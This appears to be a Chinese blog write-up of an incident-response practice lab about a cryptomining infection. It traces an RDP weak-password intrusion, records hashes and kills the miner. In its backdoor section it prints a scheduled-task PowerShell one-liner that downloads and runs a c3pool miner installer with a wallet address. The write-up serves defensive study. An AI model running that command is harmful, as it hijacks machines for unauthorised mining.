知攻善防靶场-挖矿事件

UWI Lv4

前景需要:机房运维小陈,下班后发现还有工作没完成,然后上机器越用越卡,请你帮他看看原因。

挑战题解:

攻击者的IP地址

攻击者开始攻击的时间

攻击者攻击的端口

挖矿程序的md5

后门脚本的md5

矿池地址

钱包地址

攻击者是如何攻击进入的

解题:运行桌面上的解题工具即可

攻击者开始攻击的时间

看看内存 确实像是被植入挖矿病毒了

image-20251112092251975

找到挖矿程序

image-20251112092959223

发现手动结束进程他又会自动开出一个进程

看到桌面上有一个 账号密码的xlsx 里面都是弱口令 估计是弱口令进去的

image-20251112093536407

推测一下时间 这个挖矿程序是在20:32的时候装的 也就是说弱口令登陆的时间一个就在这个时间之前

看看rdp登陆日志 估计这个就是攻击时间了2024-05-21 20:25:22

image-20251112094541914

请输入攻击者的IP地址

就是日志上的ip 192.168.115.131

请输入攻击者攻击的端口

自然是rdp端口 3389

挖矿程序的md5

前面已经定位到挖矿程序了

得到挖矿程序的 md5:6D68D914CE545056F383C47A444CEAF8

注意: 解题程序中的 md5 为 A79D49F425F95E70DDF0C68C18ABC564,这是因为系统每次开机都会重新下载挖矿软件的最新版本,所以 md5 值会不同。

矿池地址

image-20251112095901409

钱包地址

image-20251112095934115

后门脚本的md5

在计划任务里面看到一个可疑文件

image-20251112100809253

看看这个bat文件

image-20251112100915269

1
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y; Remove-Item -Force $tempfile"

应该就是下载并启动挖矿服务的玩意了

把这个恶意任务关闭

image-20251112101212566

攻击者是如何攻击进入的

估计就是rdp 弱口令了

杀进程

那么现在还有一个遗留问题就是这个挖矿进程要怎么杀掉

image-20251112124826687

直接禁用他的全部权限然后再杀进程

可以看到恢复到正常状态了

image-20251112130618156

ok 应急结束 挺简单的

  • Title: 知攻善防靶场-挖矿事件
  • Author: UWI
  • Created at : 2025-11-12 09:21:29
  • Updated at : 2025-11-14 10:50:34
  • Link: https://nbwsws.github.io/2025/11/12/应急响应/挖矿事件/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments